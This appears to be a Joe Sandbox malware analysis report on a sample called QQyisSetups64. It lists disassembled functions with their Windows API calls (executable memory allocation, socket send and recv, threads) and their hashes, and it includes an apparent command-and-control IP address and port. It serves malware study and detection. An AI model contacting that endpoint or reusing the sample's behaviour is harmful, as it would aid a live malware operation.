Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: e5fcc5941d541abdbd5c0f9921bcd073ed2427f96b6f5f68def17a0c68ddce4a
Instruction ID: f9db70ed16c0486cd6708483f687b76d5a03c79d719c94a0ec507fb0e6ba126c
Opcode Fuzzy Hash: e5fcc5941d541abdbd5c0f9921bcd073ed2427f96b6f5f68def17a0c68ddce4a
Instruction Fuzzy Hash: AB11B670E40708AFDB10EFA9DC85B6EFBF8FF44705F4085A9ED59E2240E674A9508B50

Function 02C81100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 02C8112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C8115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C81192

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 7954c4c11b7ad71da337f5877bc6229a0a2c336782aa74ba051908a688d761bf
Instruction ID: 2ef1ad0861f783b863b8c1de0bc89e7d6698da96a9ce84a5b6b4c8b419ac08a9
Opcode Fuzzy Hash: 7954c4c11b7ad71da337f5877bc6229a0a2c336782aa74ba051908a688d761bf
Instruction Fuzzy Hash: 02119670E40705ABDB109FA9DC85B6EF7F8FF04709F008969E959D2240E770A9548754

Function 03789DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03789E04
GdipDisposeImage.GDIPLUS(?), ref: 03789E18
GdipDisposeImage.GDIPLUS(?), ref: 03789E3B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Gdip$DisposeImage$BitmapCreateFromStream
String ID:
API String ID: 800915452-0
Opcode ID: 03a7db1b69f30ac8419c0aead1fc48abc5f1bf47dbe5ffa529b72ee0877b4968
Instruction ID: 64714352a052f90e70cebf09bef2a4539003fbfccf8cefb7bb406ccc1522101a
Opcode Fuzzy Hash: 03a7db1b69f30ac8419c0aead1fc48abc5f1bf47dbe5ffa529b72ee0877b4968
Instruction Fuzzy Hash: F7F0A472900219E78B10FF94D8448EEFBB8EF4A711B00855AFD05AB340D7344B05CBD1

Function 03789AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(037AFB64), ref: 03789ADC
GdiplusStartup.GDIPLUS(037AFB60,?,?), ref: 03789B15
LeaveCriticalSection.KERNEL32(037AFB64), ref: 03789B26

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterGdiplusLeaveStartup
String ID:
API String ID: 389129658-0
Opcode ID: a86f652b8a9e8d047ea55b175b5a3fe248b84d1f731353886f63929a4f0843f8
Instruction ID: 66c99c07b3cc532f20147346e92cb15f3d44732a1ab5e4659d27952f2178de53
Opcode Fuzzy Hash: a86f652b8a9e8d047ea55b175b5a3fe248b84d1f731353886f63929a4f0843f8
Instruction Fuzzy Hash: 52F06D71A816099FDB50EFE9E86A7FABBF8F785305F404299D90452181D7BA0148CFA2

Function 02C83200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 02C83200

Strings

19091, xrefs: 02CA0254
118.107.44.219, xrefs: 02CA026C

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Sleep
String ID: 118.107.44.219$19091
API String ID: 3472027048-838246116
Opcode ID: 497427054d4e2858a78d4be213b3831ed9dba2d9b5e7dbb3f2e26dcec8dc8c4f
Instruction ID: 7661883f1841f6a236055a450f335e9903bc5b67ec07453f9aa36238473c2787
Opcode Fuzzy Hash: 497427054d4e2858a78d4be213b3831ed9dba2d9b5e7dbb3f2e26dcec8dc8c4f
Instruction Fuzzy Hash: FFD023B0654122977E14E601D468536B375BF8479C3544618E44343140D2B47C08DA95

Function 0378F964 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 0378F969

Part of subcall function 03793DE2: GetLastError.KERNEL32(00000001,00000000,0378F920,0378F6FC,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 03793DE6
Part of subcall function 03793DE2: ___set_flsgetvalue.LIBCMT ref: 03793DF4
Part of subcall function 03793DE2: __calloc_crt.LIBCMT ref: 03793E08
Part of subcall function 03793DE2: DecodePointer.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793E22
Part of subcall function 03793DE2: GetCurrentThreadId.KERNEL32 ref: 03793E38
Part of subcall function 03793DE2: SetLastError.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793E50

__freeptd.LIBCMT ref: 0378F973

Part of subcall function 03793FA6: TlsGetValue.KERNEL32(?,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793FC7
Part of subcall function 03793FA6: TlsGetValue.KERNEL32(?,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793FD9
Part of subcall function 03793FA6: DecodePointer.KERNEL32(00000000,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793FEF
Part of subcall function 03793FA6: __freefls@4.LIBCMT ref: 03793FFA
Part of subcall function 03793FA6: TlsSetValue.KERNEL32(00000027,00000000,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 0379400C

ExitThread.KERNEL32 ref: 0378F97C

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 4224061863-0
Opcode ID: 5b03631e192e852c6f6c3ad1ff07de2962767338b49bad860eb854dcf930ebe8
Instruction ID: 2eeb4242e780f8e95af189d861406b64e0321038cf069813b72932172fba1eaa
Opcode Fuzzy Hash: 5b03631e192e852c6f6c3ad1ff07de2962767338b49bad860eb854dcf930ebe8
Instruction Fuzzy Hash: D8C08C280047087BBF247B31A80C90A3B1D8DC02107140211E804C9040EE24DC018090

Function 02C87156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 02C8715B

Part of subcall function 02C89896: GetLastError.KERNEL32(00000001,00000000,02C87112,02C86F0C,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C8989A
Part of subcall function 02C89896: ___set_flsgetvalue.LIBCMT ref: 02C898A8
Part of subcall function 02C89896: __calloc_crt.LIBCMT ref: 02C898BC
Part of subcall function 02C89896: DecodePointer.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C898D6
Part of subcall function 02C89896: GetCurrentThreadId.KERNEL32 ref: 02C898EC
Part of subcall function 02C89896: SetLastError.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C89904

__freeptd.LIBCMT ref: 02C87165

Part of subcall function 02C89A58: TlsGetValue.KERNEL32(?,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89A79
Part of subcall function 02C89A58: TlsGetValue.KERNEL32(?,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89A8B
Part of subcall function 02C89A58: DecodePointer.KERNEL32(00000000,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89AA1
Part of subcall function 02C89A58: __freefls@4.LIBCMT ref: 02C89AAC
Part of subcall function 02C89A58: TlsSetValue.KERNEL32(00000025,00000000,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89ABE

ExitThread.KERNEL32 ref: 02C8716E

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 4224061863-0
Opcode ID: 0c748f147904787b2aaa276780b73dafb9ffc48ca3682bbc986f73b06ba0ec4e
Instruction ID: f07521c5b40a65f4d87cf2d526b7a174ca7201625d80ee004e57b73ddaeb48e4
Opcode Fuzzy Hash: 0c748f147904787b2aaa276780b73dafb9ffc48ca3682bbc986f73b06ba0ec4e
Instruction Fuzzy Hash: 08C08C205402482A8A1037728C0C96A3A5E8E8034CFA08410B80881200EE30E8009950

Function 036001CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0360022B

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: aa82584c3a98ca59c00ac9674a5f0f98e61f5cd17128210f4cc7cf7b70007b96
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: F2A15D70A00606EFCB19CFA9C981BAEB7B5FF48304B1881A9E415DB391D770EA51CB94

Function 03783360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 03783413
_memmove.LIBCMT ref: 037834A5

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: 89a869c58eb65be31f4a728b386371bc5d0563a6e53532d7067e3b501e0a509b
Instruction ID: 7381a733e8f6f08a92a8cde3577795e42b5905cfdcab25a9693aa7a83e163673
Opcode Fuzzy Hash: 89a869c58eb65be31f4a728b386371bc5d0563a6e53532d7067e3b501e0a509b
Instruction Fuzzy Hash: 6951D17E7406059FE711EF6DC8C4A7AB7A9BF48610718866CE91E8BB00DB30F841CB90

Function 02C83350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 02C83403
_memmove.LIBCMT ref: 02C83495

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: a597f89e1a7f403be69b9fbe3a22e0cdaafca3ccb69d7923564691d6efe785e9
Instruction ID: bcdccb47179383c860d7bd7cd9b8183eb215187c4ce642471eb7ced97e8a88fb
Opcode Fuzzy Hash: a597f89e1a7f403be69b9fbe3a22e0cdaafca3ccb69d7923564691d6efe785e9
Instruction Fuzzy Hash: 0251A1727002419FD715EF69C8C0A6ABBA6BFC4718714D6A8D91A9B700D731F952CB90

Function 03782FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03783043
recv.WS2_32(?,?,00040000,00000000), ref: 03783064

Part of subcall function 0378F91B: __getptd_noexit.LIBCMT ref: 0378F91B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: feeddfa183d72fabe76faba62f93488ea55db1a60153439b7c4c60dc3b40b0e5
Instruction ID: 0ad83e4670063844225735d0877dfe69c5d3d3005bb69571cc85db6ff1fe2eb4
Opcode Fuzzy Hash: feeddfa183d72fabe76faba62f93488ea55db1a60153439b7c4c60dc3b40b0e5
Instruction Fuzzy Hash: 8821F67858030CDFEB20FF69DC88B9A77A5EF05710F1845A4E944AF180D7B4A981CBA1

Function 02C82FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02C83023
recv.WS2_32(?,?,00040000,00000000), ref: 02C83044

Part of subcall function 02C8710D: __getptd_noexit.LIBCMT ref: 02C8710D

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: 89fc3a975b84808c16da1c43e459d5a92201f9cea7d3004fd41f5dec28d90817
Instruction ID: 5d6b46668a9c1e30722b8475fc69de3f89215f00e723d9a4e5308cf644660ed1
Opcode Fuzzy Hash: 89fc3a975b84808c16da1c43e459d5a92201f9cea7d3004fd41f5dec28d90817
Instruction Fuzzy Hash: BF21B470E00248DBDB20BF24DC88B9A7774EF45718F1081E5E5059B190DBB1AE84CFA1

Function 03783260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00040000,00000000), ref: 03783291
send.WS2_32(?,?,?,00000000), ref: 037832CE

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 49e92954e88b453f6019b2c3b15e8b24a01a23eafe4cdaec45485168ba1646dd
Instruction ID: 5e20043c30a2dfd5933c520bb6b44ad6a7b17326231b98c6d77d88002461904e
Opcode Fuzzy Hash: 49e92954e88b453f6019b2c3b15e8b24a01a23eafe4cdaec45485168ba1646dd
Instruction Fuzzy Hash: BC11447EB41304BBE720EB2EDC88B4EBB9DFB81B60F144125FA0CD7281D270AC418254

Function 037830E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 0378310A
timeGetTime.WINMM ref: 03783124

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: e46fc5ed1fab301706a64b35810e5677630504e1ed250d94cf791aa316682091
Instruction ID: e4b46ca97e2f1768f9be338cf576e7badbd31f5e4d64deb75cb1518d0f37fcc3
Opcode Fuzzy Hash: e46fc5ed1fab301706a64b35810e5677630504e1ed250d94cf791aa316682091
Instruction Fuzzy Hash: DB01D439A40A05AFE311EF28C8C8B69F7A6FB99B01F184264D1044B180D735A9C6C7D1

Function 02C830C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 02C830EA
timeGetTime.WINMM ref: 02C83104

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 9a497feea9720a25021d87d318e2fe76d48933cc3e5f424bef6f3821f1a57d54
Instruction ID: ee1726bfcd4e33c4b9a6a3de1dd128c034a9ca581b0d8e98fea8cb50d4cdae6c
Opcode Fuzzy Hash: 9a497feea9720a25021d87d318e2fe76d48933cc3e5f424bef6f3821f1a57d54
Instruction Fuzzy Hash: 3701D431600245AFD711EF29D8C8B7DB3B5FB99749F149268D1008B2C0C771AAD5C7D5

Function 0378CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,0378E04E,00000000,03789800,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 0378CD1B
_free.LIBCMT ref: 0378CD56

Part of subcall function 03781280: __CxxThrowException@8.LIBCMT ref: 03781290
Part of subcall function 03781280: DeleteCriticalSection.KERNEL32(00000000,0378D3E6,037A6624,?,?,0378D3E6,?,?,?,?,037A5A40,00000000), ref: 037812A1

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
Opcode ID: 07472876f7a2039a3f4e1223c3b521b6f199c793533ec5fbdd1b4492a08e0d00
Instruction ID: 932ba9ae93b89161ee808d84b913d01d44d4e4f46da5f7ba421e4fd80f5bdc25
Opcode Fuzzy Hash: 07472876f7a2039a3f4e1223c3b521b6f199c793533ec5fbdd1b4492a08e0d00
Instruction Fuzzy Hash: CD017AB0A40B408FC331EF6A9844A47FAF8FF98700B504A1ED2DAC6A10D374A105CFA5

Function 02C86410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02C85AF2), ref: 02C8642B
_free.LIBCMT ref: 02C86466

Part of subcall function 02C81280: __CxxThrowException@8.LIBCMT ref: 02C81290
Part of subcall function 02C81280: DeleteCriticalSection.KERNEL32(00000000,?,02C97E78), ref: 02C812A1

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
Opcode ID: 11ebddc936180eb5427de1f4653426b8894c12a0ef9c17bdf9fc7ff2dd76c974
Instruction ID: cab853451c70bc87e0060089673ddbc20e89e0c84f5b69b24d0aecdd206613eb
Opcode Fuzzy Hash: 11ebddc936180eb5427de1f4653426b8894c12a0ef9c17bdf9fc7ff2dd76c974
Instruction Fuzzy Hash: 040168B0A00B408BC3209F6A9844A07FAE8BF98714B108A1ED2DAC6A10D770A145CF95

Function 0378E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0378DF10,00000000,00000000,00000000), ref: 0378E49B
WaitForSingleObject.KERNEL32(00000000,000000FF,?,03791168,?,?,?,?,?,?,037A6298,0000000C,03791210,?), ref: 0378E4A9

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 2bb3a40809194b63299afeeff1fc51d59b562d50b6ed9319b0b471ba2de0cc59
Instruction ID: 6ebf44bf9feed8baaf02e6362979a9c2da8d65607049d4fa138643b7f34fab56
Opcode Fuzzy Hash: 2bb3a40809194b63299afeeff1fc51d59b562d50b6ed9319b0b471ba2de0cc59
Instruction Fuzzy Hash: 08E05BB0588209BFDF10FB54EC84F7633ECD7043317218615F928C2289E6399850C760

Function 0378F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0378F98F

Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B

Part of subcall function 0378F964: __getptd_noexit.LIBCMT ref: 0378F969
Part of subcall function 0378F964: __freeptd.LIBCMT ref: 0378F973
Part of subcall function 0378F964: ExitThread.KERNEL32 ref: 0378F97C

__XcptFilter.LIBCMT ref: 0378F9B0

Part of subcall function 0379418F: __getptd_noexit.LIBCMT ref: 03794195

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: e7fe046e07d4d75dbf3f69dda03fb943e360090edce305159ac1ab589d0992a9
Instruction ID: 0b77a19ad07d93688bca74c562712b681a6a44097991ba2f1a4ba48607c9cb6a
Opcode Fuzzy Hash: e7fe046e07d4d75dbf3f69dda03fb943e360090edce305159ac1ab589d0992a9
Instruction Fuzzy Hash: BDE0ECB9940700EFEF18FBA5E809E7D7775AF48601F20024AE1016F2A1CB799941DB21

Function 02C87175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02C87181

Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F

Part of subcall function 02C87156: __getptd_noexit.LIBCMT ref: 02C8715B
Part of subcall function 02C87156: __freeptd.LIBCMT ref: 02C87165
Part of subcall function 02C87156: ExitThread.KERNEL32 ref: 02C8716E

__XcptFilter.LIBCMT ref: 02C871A2

Part of subcall function 02C89C41: __getptd_noexit.LIBCMT ref: 02C89C47

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: c61b9da7888c13092d72a826444d718a347c39ff058e72cdf6096974a2198557
